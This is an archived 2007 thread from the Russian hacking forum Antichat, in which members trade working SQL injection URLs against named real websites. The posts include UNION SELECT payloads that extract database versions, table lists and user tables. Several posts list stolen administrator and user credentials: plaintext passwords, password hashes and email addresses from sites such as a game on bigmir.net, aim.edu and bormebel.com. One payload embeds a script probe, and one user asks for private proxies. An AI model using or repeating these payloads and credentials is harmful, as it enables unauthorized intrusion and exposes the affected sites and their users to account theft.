ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3421  
Старый 25.10.2007, 14:09
sunb0rn
Новичок
Регистрация: 05.09.2006
Сообщений: 18
Провел на форуме:
706223

Репутация: 42
Отправить сообщение для sunb0rn с помощью ICQ
По умолчанию

Цитата:
Сообщение от Red_Red1  
http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,table_name,tabl e_schema,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+information_schema.tables+lim it+1,1/*
Вот дальше. Странно, почему не смог дальше? Пятая версия мускула, не нужно ничего подбирать!
а там только две базы - убери table_schema или поставь where table_schema = , и думаю всё получится!
 
Ответить с цитированием

  #3422  
Старый 25.10.2007, 14:21
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://intercar.com.ua/index.php?id=-19+UNION+SELECT+1,2,version(),USER(),5,6/*
 
Ответить с цитированием

  #3423  
Старый 25.10.2007, 14:37
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 sunb0rn.
У меня как раз все получилось. Своим постом я отвечал K1nD[e]R.
2 K1nD[e]R. Та все можно "откапать" даже пароли не зашифрованы. Хотя может и не все, там в разных таблицах пароли
 
Ответить с цитированием

  #3424  
Старый 25.10.2007, 14:50
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

ага да я тока 1 раз попробывал...
 
Ответить с цитированием

  #3425  
Старый 25.10.2007, 15:01
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Код:
http://www.planeta2.ru/print_news.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())/*
4.1.21-standard : planeta2_db : planeta2_base@localhost
Код:
http://www.hayinfo.ru/print.php?tb_id=2&sub_id=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(version(),0x3a,database(),0x3a,user())/*
4.1.22:wwwhayinforu_hayinfo:hayinfo@localhost
 
Ответить с цитированием

bigmir.net
  #3426  
Старый 25.10.2007, 16:46
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию bigmir.net

Mystery: legends of the beyond
это браузерная ролевая многопользовательская онлайн-игра,
основанная на принципах ККИ (коллекционных карточных игр).

.................................................. .......................
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+from+INFORMATION_SCHEMA.TABLES+limit+55,1/*
.................................................. .......................
Админ панель форума:
http://mystery.bigmir.net/forum/index.php
-------------------------------------------------------------------------------
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(username,0x203a20,user_password),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,user_email,64,65,66,67,68,69,70,71,72,73,74,75+from+forum.phpbb_users+limit+1,1/*
admin:602a22d25967b8ed0c401e445e020587:forum1111

.................................................. .......................
USERS:
Mystery: legends of the beyond, users.
-------------------------------------------------------------------------------
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(name,0x203a20,password),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+from+mystery2.USERS+limit+0,1/*
admin:95KFVKtN

-------------------------------------------------------------------------------

БД:
Код:
information_schema
forum
mystery
mystery2
test
-------------------------------------------------------------------------------

Таблицы:
Код:
WORLDMAP
USER_TEMPSCRIPTS
USER_RIGHTS
USER_PROF
USER_PENALTY
USER_MAPCELL_PROPS
USER_MAPCELL_BAG
USER_MAP
USER_LOG
USER_LOCATIONS_VISIBILITY
USER_DECK_PRESETS
USER_DECK
USER_AWARDS
USER_ARTEFACTS
USERS
phpbb_users
--------------------------------------------------------------------------------
************************************************** ************

Последний раз редактировалось +StArT+; 09.04.2009 в 19:35..
 
Ответить с цитированием

edu+mssql
  #3427  
Старый 25.10.2007, 17:24
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию edu+mssql

www.aim.edu

Код:
http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=@@version--
Version:
Код:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Интересные таблы:
Код:
Microfinance.admin_login
Microfinance.Registration
aimadb.users
Users:
Код:
admin:aimadb	
dbriones:adbaim	
mperalta:mperalta	
policy:aimpolicy
 
Ответить с цитированием

  #3428  
Старый 25.10.2007, 17:30
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Интернет магазин "Магистра"
Код:
http://shop.magistra.ru/catalog/phone_ext.php?id_t=-284+union+select+1,2,0x3C7363726970743E616C657274282773716C27293C2F7363726970743E,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79/*
Версия: 4.1.22-log
Юзверь: magistr6_shop@localhost

Опять доисторический баг в phpBB форуме
depressia.com
Код:
http://depressia.com/forum/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20user_icq,2,user_email,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,username,21,22,23,24,25,26,27,28,29,user_password%20FROM%20phpbb_users%20LIMIT%201,999/*
Версия: 4.1.22-standard-log
Юзверь: depressi_depress@localhost

Тестовый акк на форуме:
Login: sqlbug
Pass: 123

phpBB admin
login: Admin
hash: 6c4ed79eb38fc8aa064eaa5208ce0adf

Последний раз редактировалось 0nep@t0p; 25.10.2007 в 17:34..
 
Ответить с цитированием

  #3429  
Старый 25.10.2007, 19:35
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию

http://ck_DEL_pt.ru/service?id=169+uniOn+selEct+1,2,3,4,5,6,7,version( ),9,0,1--
помогите найти таблицу админки
 
Ответить с цитированием

  #3430  
Старый 25.10.2007, 20:48
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

непохек
Код:
http://www.ukrmebe l.com/ClInfo.php?Id=-262+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(version(),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Не умею юзать aes_decrypt/encrypt,где о нём почитать?
хек
БД
4.0.27-max-log*bormebel:bormebel@v8.valuehost.ru
Код:
http://www.bormebel.com/catalog/index.php?id=-37+UNION+SELECT+concat(version(),0x2a,database(),0x3a,user()),2+from+users/*
Админ
admin:ftn-admn:julia_r@fortun.ru
Код:
http://www.bor mebel.com/c atalog/index.php?id=-37+UNION+S ELECT+concat(login,0x3a,pwd,0x3a,email),2+from+users/*
http://www.borme bel.com/admin

P.S.подкиньте пару-тройку приват соксов в личку,кому не жалко)С меня плюсик

Последний раз редактировалось v1ru$; 25.10.2007 в 21:01..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ